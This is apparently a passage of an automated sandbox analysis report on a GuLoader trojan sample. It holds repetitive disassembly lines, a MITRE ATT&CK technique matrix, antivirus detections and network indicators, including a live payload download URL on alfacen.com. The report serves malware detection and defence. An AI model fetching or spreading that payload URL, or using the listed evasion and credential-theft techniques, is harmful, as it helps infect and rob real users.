    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov eax, dword ptr fs:[00000030h]4_2_359C92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov ecx, dword ptr fs:[00000030h]4_2_359C92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov ecx, dword ptr fs:[00000030h]4_2_359C92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15283 mov eax, dword ptr fs:[00000030h]4_2_35A15283
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A0 mov eax, dword ptr fs:[00000030h]4_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D72A0 mov eax, dword ptr fs:[00000030h]4_2_359D72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D72A0 mov eax, dword ptr fs:[00000030h]4_2_359D72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B2D3 mov eax, dword ptr fs:[00000030h]4_2_3593B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B2D3 mov eax, dword ptr fs:[00000030h]4_2_3593B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B2D3 mov eax, dword ptr fs:[00000030h]4_2_3593B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A152E2 mov eax, dword ptr fs:[00000030h]4_2_35A152E2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F2D0 mov eax, dword ptr fs:[00000030h]4_2_3596F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F2D0 mov eax, dword ptr fs:[00000030h]4_2_3596F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359492C5 mov eax, dword ptr fs:[00000030h]4_2_359492C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359492C5 mov eax, dword ptr fs:[00000030h]4_2_359492C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C0 mov eax, dword ptr fs:[00000030h]4_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF2F8 mov eax, dword ptr fs:[00000030h]4_2_359FF2F8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359392FF mov eax, dword ptr fs:[00000030h]4_2_359392FF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB2F0 mov eax, dword ptr fs:[00000030h]4_2_359EB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB2F0 mov eax, dword ptr fs:[00000030h]4_2_359EB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED mov eax, dword ptr fs:[00000030h]4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15227 mov eax, dword ptr fs:[00000030h]4_2_35A15227
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35977208 mov eax, dword ptr fs:[00000030h]4_2_35977208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35977208 mov eax, dword ptr fs:[00000030h]4_2_35977208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB256 mov eax, dword ptr fs:[00000030h]4_2_359FB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB256 mov eax, dword ptr fs:[00000030h]4_2_359FB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0D26B mov eax, dword ptr fs:[00000030h]4_2_35A0D26B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0D26B mov eax, dword ptr fs:[00000030h]4_2_35A0D26B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD250 mov ecx, dword ptr fs:[00000030h]4_2_359CD250
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939240 mov eax, dword ptr fs:[00000030h]4_2_35939240
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939240 mov eax, dword ptr fs:[00000030h]4_2_35939240
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597724D mov eax, dword ptr fs:[00000030h]4_2_3597724D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35969274 mov eax, dword ptr fs:[00000030h]4_2_35969274
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35981270 mov eax, dword ptr fs:[00000030h]4_2_35981270
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35981270 mov eax, dword ptr fs:[00000030h]4_2_35981270
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939D96 mov eax, dword ptr fs:[00000030h]4_2_35939D96
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939D96 mov eax, dword ptr fs:[00000030h]4_2_35939D96
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939D96 mov ecx, dword ptr fs:[00000030h]4_2_35939D96
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593FD80 mov eax, dword ptr fs:[00000030h]4_2_3593FD80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595DDB1 mov eax, dword ptr fs:[00000030h]4_2_3595DDB1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595DDB1 mov eax, dword ptr fs:[00000030h]4_2_3595DDB1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595DDB1 mov eax, dword ptr fs:[00000030h]4_2_3595DDB1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CDDB1 mov eax, dword ptr fs:[00000030h]4_2_359CDDB1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35979DAF mov eax, dword ptr fs:[00000030h]4_2_35979DAF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594FDA9 mov eax, dword ptr fs:[00000030h]4_2_3594FDA9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D5DA0 mov eax, dword ptr fs:[00000030h]4_2_359D5DA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D5DA0 mov eax, dword ptr fs:[00000030h]4_2_359D5DA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D5DA0 mov eax, dword ptr fs:[00000030h]4_2_359D5DA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D5DA0 mov ecx, dword ptr fs:[00000030h]4_2_359D5DA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943DD0 mov eax, dword ptr fs:[00000030h]4_2_35943DD0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943DD0 mov eax, dword ptr fs:[00000030h]4_2_35943DD0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FDDC7 mov eax, dword ptr fs:[00000030h]4_2_359FDDC7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CDDC0 mov eax, dword ptr fs:[00000030h]4_2_359CDDC0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0DDC6 mov eax, dword ptr fs:[00000030h]4_2_35A0DDC6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D00 mov eax, dword ptr fs:[00000030h]4_2_35953D00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D20 mov eax, dword ptr fs:[00000030h]4_2_35953D20
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CFD2A mov eax, dword ptr fs:[00000030h]4_2_359CFD2A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CFD2A mov eax, dword ptr fs:[00000030h]4_2_359CFD2A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35937D41 mov eax, dword ptr fs:[00000030h]4_2_35937D41
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov ecx, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D40 mov eax, dword ptr fs:[00000030h]4_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597BD4E mov eax, dword ptr fs:[00000030h]4_2_3597BD4E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597BD4E mov eax, dword ptr fs:[00000030h]4_2_3597BD4E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CDD47 mov eax, dword ptr fs:[00000030h]4_2_359CDD47
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947D75 mov eax, dword ptr fs:[00000030h]4_2_35947D75
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947D75 mov eax, dword ptr fs:[00000030h]4_2_35947D75
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h]4_2_359EFD78
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h]4_2_359EFD78
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h]4_2_359EFD78
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h]4_2_359EFD78
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EFD78 mov eax, dword ptr fs:[00000030h]4_2_359EFD78
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F9D70 mov eax, dword ptr fs:[00000030h]4_2_359F9D70
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F9D70 mov eax, dword ptr fs:[00000030h]4_2_359F9D70
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15D50 mov eax, dword ptr fs:[00000030h]4_2_35A15D50
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15D50 mov eax, dword ptr fs:[00000030h]4_2_35A15D50
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h]4_2_35A01D5A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h]4_2_35A01D5A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h]4_2_35A01D5A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A01D5A mov eax, dword ptr fs:[00000030h]4_2_35A01D5A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h]4_2_35943C84
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h]4_2_35943C84
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h]4_2_35943C84
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943C84 mov eax, dword ptr fs:[00000030h]4_2_35943C84
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593DCA0 mov eax, dword ptr fs:[00000030h]4_2_3593DCA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h]4_2_359FFCAB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    Masquerading    		OS Credential Dumping211
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Process Injection    		1
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Clipboard Data    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		1
    Access Token Manipulation    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Process Injection    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture3
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    450707124374000811.exe45%ReversingLabsWin32.Trojan.Guloader
    450707124374000811.exe100%AviraHEUR/AGEN.1337946

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    alfacen.com
    		193.107.36.30
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://alfacen.com/GZgWeuQ77.binfalse
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
          		unknown
          https://alfacen.com/GZgWeuQ77.bince450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://alfacen.com/GZgWeuQ77.binR450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                		unknown
                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                  		unknown
                  https://alfacen.com/GZgWeuQ77.bines450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://alfacen.com/GZgWeuQ77.binH450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://www.ftp.ftp://ftp.gopher.450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                        		unknown
                        https://alfacen.com/GZgWeuQ77.bine450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorError450707124374000811.exefalse
                          • URL Reputation: safe
                          		unknown
                          https://alfacen.com/450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://alfacen.com/GZgWeuQ77.binnsz450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              193.107.36.30
                              		alfacen.comBulgaria
                              		201200SUPERHOSTING_ASBGfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1538185
                              Start date and time:2024-10-20 19:14:33 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 47s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:450707124374000811.exe
                              Detection:MAL
                              Classification:mal80.troj.evad.winEXE@2/8@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 48
                              • Number of non-executed functions: 294
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                              Warnings

                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: 450707124374000811.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              193.107.36.303507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                    Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                      SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                        SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          alfacen.com3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          SUPERHOSTING_ASBG3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          Atlanta Office Interiors #024-010.pdfGet hashmaliciousUnknownBrowse
                                          • 185.45.66.155
